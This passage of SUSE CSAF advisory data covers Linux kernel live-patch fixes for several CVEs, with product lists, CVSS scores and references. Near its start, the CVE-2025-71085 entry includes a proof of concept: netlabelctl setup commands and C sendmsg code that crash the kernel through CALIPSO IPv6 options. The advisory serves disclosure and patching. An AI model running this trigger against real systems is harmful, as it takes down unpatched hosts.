"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = 
cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T08:05:21Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
}
]
}
SUSE-SU-2026:1125-1
Vulnerability from csaf_suse - Published: 2026-03-27 14:04 - Updated: 2026-03-27 14:04
Summary
Security update for the Linux Kernel (Live Patch 0 for SUSE Linux Enterprise 15 SP7)
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel (Live Patch 0 for SUSE Linux Enterprise 15 SP7)
Description of the patch:
This update for the SUSE Linux Enterprise Kernel 6.4.0-150700.51 fixes various security issues
The following security issues were fixed:
- CVE-2025-38159: wifi: rtw88: fix the 'para' buffer size to avoid reading out of bounds (bsc#1257629).
- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).
- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).
- CVE-2025-40284: Bluetooth: MGMT: cancel mesh send timer when hdev removed (bsc#1257669).
- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255895).
- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).
- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).
Patchnames: SUSE-2026-1125,SUSE-SLE-Module-Live-Patching-15-SP6-2026-1125,SUSE-SLE-Module-Live-Patching-15-SP7-2026-1121
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64 | — | | Vendor Fix |
Threats
Impact
important
7.8 (High)
Affected products
Recommended
6 products
Threats
Impact
important
Affected products
Recommended
6 products
Threats
Impact
important
7.8 (High)
Affected products
Recommended
6 products
Threats
Impact
important
Affected products
Recommended
6 products
Threats
Impact
important
7.3 (High)
Affected products
Recommended
6 products
Threats
Impact
important
Affected products
Recommended
6 products
Threats
Impact
important
7.5 (High)
Affected products
Recommended
6 products
Threats
Impact
important
7.5 (High)
Affected products
Recommended
6 products
Threats
Impact
important
References
49 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel (Live Patch 0 for SUSE Linux Enterprise 15 SP7)",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThis update for the SUSE Linux Enterprise Kernel 6.4.0-150700.51 fixes various security issues\n\nThe following security issues were fixed:\n\n- CVE-2025-38159: wifi: rtw88: fix the \u0027para\u0027 buffer size to avoid reading out of bounds (bsc#1257629).\n- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).\n- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).\n- CVE-2025-40284: Bluetooth: MGMT: cancel mesh send timer when hdev removed (bsc#1257669).\n- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255895).\n- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).\n- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1125,SUSE-SLE-Module-Live-Patching-15-SP6-2026-1125,SUSE-SLE-Module-Live-Patching-15-SP7-2026-1121",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1125-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1125-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261125-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1125-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/025019.html"
},
{
"category": "self",
"summary": "SUSE Bug 1247240",
"url": "https://bugzilla.suse.com/1247240"
},
{
"category": "self",
"summary": "SUSE Bug 1255053",
"url": "https://bugzilla.suse.com/1255053"
},
{
"category": "self",
"summary": "SUSE Bug 1255378",
"url": "https://bugzilla.suse.com/1255378"
},
{
"category": "self",
"summary": "SUSE Bug 1255402",
"url": "https://bugzilla.suse.com/1255402"
},
{
"category": "self",
"summary": "SUSE Bug 1255895",
"url": "https://bugzilla.suse.com/1255895"
},
{
"category": "self",
"summary": "SUSE Bug 1256624",
"url": "https://bugzilla.suse.com/1256624"
},
{
"category": "self",
"summary": "SUSE Bug 1256644",
"url": "https://bugzilla.suse.com/1256644"
},
{
"category": "self",
"summary": "SUSE Bug 1257629",
"url": "https://bugzilla.suse.com/1257629"
},
{
"category": "self",
"summary": "SUSE Bug 1257669",
"url": "https://bugzilla.suse.com/1257669"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38159 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38159/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38488 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38488/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40258 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40258/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40297 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40297/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68285 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68285/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
}
],
"title": "Security update for the Linux Kernel (Live Patch 0 for SUSE Linux Enterprise 15 SP7)",
"tracking": {
"current_release_date": "2026-03-27T14:04:13Z",
"generator": {
"date": "2026-03-27T14:04:13Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1125-1",
"initial_release_date": "2026-03-27T14:04:13Z",
"revision_history": [
{
"date": "2026-03-27T14:04:13Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"product_id": "kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"product": {
"name": "kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"product_id": "kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"product_id": "kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"product": {
"name": "kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"product_id": "kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"product_id": "kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64",
"product": {
"name": "kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64",
"product_id": "kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 15 SP6",
"product": {
"name": "SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-live-patching:15:sp6"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-live-patching:15:sp7"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le"
},
"product_reference": "kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x"
},
"product_reference": "kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
},
"product_reference": "kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-38159",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38159"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtw88: fix the \u0027para\u0027 buffer size to avoid reading out of bounds\n\nSet the size to 6 instead of 2, since \u0027para\u0027 array is passed to\n\u0027rtw_fw_bt_wifi_control(rtwdev, para[0], \u0026para[1])\u0027, which reads\n5 bytes:\n\nvoid rtw_fw_bt_wifi_control(struct rtw_dev *rtwdev, u8 op_code, u8 *data)\n{\n ...\n SET_BT_WIFI_CONTROL_DATA1(h2c_pkt, *data);\n SET_BT_WIFI_CONTROL_DATA2(h2c_pkt, *(data + 1));\n ...\n SET_BT_WIFI_CONTROL_DATA5(h2c_pkt, *(data + 4));\n\nDetected using the static analysis tool - Svace.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38159",
"url": "https://www.suse.com/security/cve/CVE-2025-38159"
},
{
"category": "external",
"summary": "SUSE Bug 1245751 for CVE-2025-38159",
"url": "https://bugzilla.suse.com/1245751"
},
{
"category": "external",
"summary": "SUSE Bug 1257629 for CVE-2025-38159",
"url": "https://bugzilla.suse.com/1257629"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T14:04:13Z",
"details": "important"
}
],
"title": "CVE-2025-38159"
},
{
"cve": "CVE-2025-38488",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38488"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix use-after-free in crypt_message when using async crypto\n\nThe CVE-2024-50047 fix removed asynchronous crypto handling from\ncrypt_message(), assuming all crypto operations are synchronous.\nHowever, when hardware crypto accelerators are used, this can cause\nuse-after-free crashes:\n\n crypt_message()\n // Allocate the creq buffer containing the req\n creq = smb2_get_aead_req(..., \u0026req);\n\n // Async encryption returns -EINPROGRESS immediately\n rc = enc ? crypto_aead_encrypt(req) : crypto_aead_decrypt(req);\n\n // Free creq while async operation is still in progress\n kvfree_sensitive(creq, ...);\n\nHardware crypto modules often implement async AEAD operations for\nperformance. When crypto_aead_encrypt/decrypt() returns -EINPROGRESS,\nthe operation completes asynchronously. Without crypto_wait_req(),\nthe function immediately frees the request buffer, leading to crashes\nwhen the driver later accesses the freed memory.\n\nThis results in a use-after-free condition when the hardware crypto\ndriver later accesses the freed request structure, leading to kernel\ncrashes with NULL pointer dereferences.\n\nThe issue occurs because crypto_alloc_aead() with mask=0 doesn\u0027t\nguarantee synchronous operation. Even without CRYPTO_ALG_ASYNC in\nthe mask, async implementations can be selected.\n\nFix by restoring the async crypto handling:\n- DECLARE_CRYPTO_WAIT(wait) for completion tracking\n- aead_request_set_callback() for async completion notification\n- crypto_wait_req() to wait for operation completion\n\nThis ensures the request buffer isn\u0027t freed until the crypto operation\ncompletes, whether synchronous or asynchronous, while preserving the\nCVE-2024-50047 fix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38488",
"url": "https://www.suse.com/security/cve/CVE-2025-38488"
},
{
"category": "external",
"summary": "SUSE Bug 1247239 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247239"
},
{
"category": "external",
"summary": "SUSE Bug 1247240 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247240"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T14:04:13Z",
"details": "important"
}
],
"title": "CVE-2025-38488"
},
{
"cve": "CVE-2025-40258",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40258"
}
],
"notes": [
{
"category": "general",
